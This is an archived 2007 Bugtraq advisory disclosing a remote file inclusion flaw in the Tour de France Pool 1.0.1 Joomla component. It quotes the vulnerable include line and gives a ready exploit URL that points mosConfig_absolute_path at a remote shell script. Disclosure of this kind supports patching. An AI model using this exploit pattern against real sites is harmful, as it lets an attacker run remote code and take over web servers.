[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

our de France Pool 1.0.1 Remote File İnclude Bug

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: our de France Pool 1.0.1 Remote File İnclude Bug
From: yollubunlar@xxxxxxxxxxxxxxx
Date: 2 Aug 2007 17:58:29 -0000

------------Yollubunlar.Org----------------

Title   : Tour de France Pool 1.0.1 Remote File &#304;nclude Bug

Author  : Yollubunlar.Org

Orginal : 
http://yollubunlar.org/our-de-france-pool-101-remote-file-include-43.html

Mail    : yollubunlar@xxxxxxxxxxx

Down    : 
http://joomla.bultena.com/component/option,com_remository/Itemid,26/func,download/id,19/chk,f9f89538d34c214c01bfc48dc276e762/lang,en/

Bug     : in admin.tour_toto.php " require_once( 
$mosConfig_absolute_path.'/administrator/components/com_tour_toto/riders.php'); 
"

Exploit : 
site.com/path/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=sHELL?

Greetz:  Yollubunlar.Org 

Not: Vatan Sagolsun ! &#350;ehitler Ölmez , Vatan Bölünmez "

Prev by Date: Hunkaray Okul Portali v1.1 (tr) Sql injection Vuln
Next by Date: [Whitepaper SecNiche] Insecurities in Implementing Serialization in BISON
Previous by thread: Hunkaray Okul Portali v1.1 (tr) Sql injection Vuln
Next by thread: [Whitepaper SecNiche] Insecurities in Implementing Serialization in BISON
Index(es):
- Date
- Thread

our de France Pool 1.0.1 Remote File &#304;nclude Bug

our de France Pool 1.0.1 Remote File İnclude Bug